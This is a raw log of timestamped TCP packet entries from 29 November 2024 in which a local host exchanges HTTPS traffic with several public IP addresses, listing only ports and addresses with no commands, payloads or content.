Nov 29, 2024 12:27:44.144305944 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:44.149962902 CET	49722	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.150033951 CET	49723	443	192.168.2.8	142.250.181.68
Nov 29, 2024 12:27:44.543101072 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:44.543206930 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:44.544058084 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:44.544071913 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:44.559432983 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:44.559439898 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.133039951 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:45.133091927 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:45.133163929 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:45.134565115 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:45.134583950 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:45.614870071 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.614943027 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.615710020 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.615722895 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.722762108 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.722821951 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.722850084 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.722883940 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.722894907 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.722917080 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976542950 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976564884 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976598024 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976610899 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976628065 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976634026 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976660967 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976667881 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976782084 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976794958 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976804018 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976813078 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976846933 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976852894 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.976952076 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.976980925 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977018118 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977051973 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977122068 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977122068 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977138042 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977144003 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977200985 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977313995 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977344990 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977368116 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977407932 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977471113 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977471113 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977520943 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977526903 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977545977 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977641106 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.977664948 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:45.977670908 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.988174915 CET	49728	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:45.988203049 CET	443	49728	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:46.023329020 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:46.124942064 CET	49704	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:46.125005960 CET	49704	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:46.126980066 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:46.127037048 CET	443	49731	23.206.229.226	192.168.2.8
Nov 29, 2024 12:27:46.127094030 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:46.169680119 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:46.169734001 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:46.169797897 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:46.170120001 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:46.170140028 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:46.177448034 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:46.177484989 CET	443	49731	23.206.229.226	192.168.2.8
Nov 29, 2024 12:27:46.245192051 CET	443	49704	23.206.229.226	192.168.2.8
Nov 29, 2024 12:27:46.245220900 CET	443	49704	23.206.229.226	192.168.2.8
Nov 29, 2024 12:27:46.486670017 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:46.486748934 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:46.489110947 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:46.489124060 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:46.489373922 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:46.534008026 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:46.535581112 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:46.579339027 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:46.997114897 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:46.997189999 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:46.997332096 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:46.997371912 CET	49730	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:46.997386932 CET	443	49730	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:47.039208889 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:47.039275885 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:47.039464951 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:47.039830923 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:47.039849997 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:47.594815016 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:47.594880104 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:47.595582008 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:47.595591068 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:47.604839087 CET	443	49731	23.206.229.226	192.168.2.8
Nov 29, 2024 12:27:47.604917049 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:47.611661911 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:47.611671925 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:47.611769915 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:47.611785889 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:47.611936092 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:47.611955881 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:47.612020969 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:47.612030029 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:48.082535028 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:48.082612038 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:48.082681894 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:48.083539009 CET	49729	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:48.083558083 CET	443	49729	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:48.213135004 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:48.213180065 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:48.213392973 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:48.213881016 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:48.213896036 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:48.433321953 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.433407068 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:48.434607983 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:48.434617996 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.434978008 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.435998917 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:48.483334064 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.945323944 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.945416927 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.945476055 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:48.946266890 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:48.946284056 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:48.946346998 CET	49733	443	192.168.2.8	2.18.84.141
Nov 29, 2024 12:27:48.946352005 CET	443	49733	2.18.84.141	192.168.2.8
Nov 29, 2024 12:27:49.242436886 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.242513895 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.242511988 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.242568970 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.243408918 CET	49732	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.243422985 CET	443	49732	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.682012081 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.682079077 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.682799101 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.682813883 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703440905 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703468084 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703613997 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703629971 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703758001 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703777075 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703785896 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703795910 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703886986 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703900099 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703921080 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703936100 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703948975 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.703954935 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.703989029 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.704005957 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.704030991 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.704041004 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:49.704066038 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:49.704075098 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:50.224272013 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:50.224342108 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:50.224405050 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:50.224848032 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:50.224858046 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:51.689861059 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:51.689940929 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:51.689953089 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:51.690088987 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:51.691932917 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:51.692794085 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:51.706427097 CET	49734	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:51.706461906 CET	443	49734	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:51.707710028 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:51.707731009 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:51.905168056 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:51.905208111 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:53.030958891 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:53.031025887 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:53.031111002 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:53.131634951 CET	49735	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:53.131656885 CET	443	49735	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:54.366944075 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:54.366996050 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:54.367116928 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:54.375056028 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:54.375073910 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:55.652926922 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:55.652971029 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:55.653062105 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:55.654448032 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:55.654462099 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:56.116205931 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.117489100 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.117520094 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.118621111 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.118700027 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.124011040 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.124159098 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.124253035 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.124278069 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.172287941 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.459264994 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:56.459322929 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:56.459496975 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:56.531028032 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:56.531073093 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:56.615288973 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.615391016 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:56.615520000 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.670095921 CET	49742	443	192.168.2.8	94.245.104.56
Nov 29, 2024 12:27:56.670131922 CET	443	49742	94.245.104.56	192.168.2.8
Nov 29, 2024 12:27:57.225577116 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:57.225632906 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:57.225749969 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:57.226748943 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:57.226758957 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:57.442125082 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:57.442168951 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:57.442246914 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:57.442898989 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:57.442913055 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:57.499743938 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:57.499829054 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:57.668747902 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:57.668775082 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:57.669157028 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:57.671128988 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:57.671158075 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:57.671195030 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.043616056 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.043715000 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.044528008 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.044542074 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.150969028 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.151004076 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.151149988 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.151159048 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.570394993 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.570420980 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.570461988 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.570502043 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.570518970 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.570529938 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.574949026 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.574949026 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.575108051 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.575138092 CET	443	49744	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.575192928 CET	49744	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.672911882 CET	49759	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:58.672967911 CET	443	49759	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:58.673101902 CET	49759	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:58.673450947 CET	49759	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:58.673470020 CET	443	49759	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:58.674138069 CET	49760	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:58.674185991 CET	443	49760	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:58.674422979 CET	49760	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:58.675198078 CET	49760	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:58.675211906 CET	443	49760	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:58.762312889 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.762376070 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.762471914 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.763293982 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:27:58.763320923 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:27:58.776449919 CET	49762	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:58.776515007 CET	443	49762	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:58.776577950 CET	49762	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:58.777215958 CET	49762	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:58.777244091 CET	443	49762	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:58.910887003 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.910947084 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.911348104 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.911360025 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.924910069 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.937680960 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:58.937686920 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.938142061 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.938157082 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.938208103 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:58.938214064 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.938251019 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:58.938931942 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.944523096 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:58.944596052 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.944637060 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:58.944642067 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:58.963821888 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.963833094 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.963917017 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.963927031 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.963932991 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.963952065 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964035988 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964056969 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964174032 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964196920 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964207888 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964222908 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964272976 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964287043 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964397907 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964410067 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964487076 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964495897 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964520931 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964529991 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964571953 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964581966 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964612007 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964623928 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964627028 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964634895 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964647055 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964647055 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964653969 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964667082 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:58.964679003 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:58.964685917 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:59.014173985 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.040853977 CET	49759	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.041416883 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.041467905 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.041660070 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.041852951 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.041863918 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.042634964 CET	49760	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.043512106 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.043523073 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:59.043747902 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.044981956 CET	49762	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.045330048 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.045370102 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.045425892 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.045475006 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.045485973 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:59.045680046 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.045696020 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.083369970 CET	443	49760	162.159.61.3	192.168.2.8
